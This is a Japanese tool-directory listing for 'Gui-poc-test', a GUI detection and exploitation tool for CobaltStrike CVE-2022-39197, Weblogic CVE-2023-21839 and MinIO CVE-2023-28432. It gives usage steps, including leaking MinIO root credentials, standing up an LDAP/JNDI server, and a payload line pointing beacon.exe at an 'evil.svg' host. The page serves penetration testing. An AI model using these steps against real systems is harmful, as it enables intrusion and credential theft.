Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Gui-poc-test — CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 のテストツール | Kitploit
ツール/GitHubGitHub/romanc9/gui-poc-test
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ペネトレーションテストペイロード開発
GitHubromanc9/gui-poc-test

Gui-poc-test

CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432 のテストツール

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Gui-poc-test

A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432

これら3つの脆弱性のグラフィカルな脆弱性検出および悪用ツール

注意事項

  1. Jarの実行にはJava8が必要です
  2. 単一ターゲット向けで、複数IPの脆弱性スキャンには対応していません
  3. パッケージ化時、Weblogic脆弱性悪用にはwlfullclient.jarの参照が必要で、自分で追加する必要があります

Usage

java -jar Gui-poc-test.jar

使用方法:「検出」と「悪用」の2つのボタンがあります。脆弱性ごとに異なる使用方法はツールインターフェースにヒントが表示されます。

MinIO 情報漏洩:

ターゲットを入力し、ポートはデフォルト9000(変更可能、ソースコードGuiDemo.java:line144参照)

MINIO_ROOT_USERやMINIO_ROOT_PASSWORDなどを表示

image

Weblogic RCE

ターゲットのIP、ポート、LDAPサーバーアドレスを入力

検出:

image

注意:脆弱性の悪用には自分でLDAPサーバー(パブリックネットワーク)を構築する必要があります

  • jndi server悪用ツール:JNDIExploit.jarを使用してLDAPおよびWEBサービスを起動します。参考: https://github.com/WhiteHSBG/JNDIExploit
image

CobaltStrike RCE

  1. 脆弱性選択後、デフォルトで自己チェック方法が表示されます。CSリスナーに検出コードを入力して脆弱性の有無を自己テストできます。
  2. 脆弱性悪用の前提:ローカルで相手のトロイの木馬(exe)を入手していること
  3. 実行環境要件:Windows、Python3、pip3でfrida-toolsをインストール
  4. Pythonが環境変数に追加されていること
  5. 自分でサーバーを構築し、SVGファイルとJarファイルを配置し、相手がアクセスできるようにする
  6. exeの絶対パスとSVGアドレスをスペース区切りで入力し、「実行」をクリックして対抗する
  7. Jarファイルの内容は自分で設定可能。デモ内容は電卓が表示される
  8. デフォルトのトロイの木馬名はbeacon、変更可能(ソースコードcve_2022_39197.py:line28参照)

ペイロード例: beacon.exe http://127.0.0.1:4444/evil.svg

実現結果:Windowsでトロイの木馬を実行し、Mac上のCSクライアントが接続される

同時にCS側でJarファイルの内容が実行され、電卓が表示される

image

WindowsでCSへのアクセスアドレスが記録される

image

Reference

原理:https://github.com/gobysec/Weblogic/blob/main/WebLogic_CVE-2023-21931_zh_CN.md

https://github.com/4ra1n/CVE-2023-21839

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

https://github.com/its-arun/CVE-2022-39197

CSパッチ:https://github.com/burpheart/CVE-2022-39197-patch

ツールをダウンロード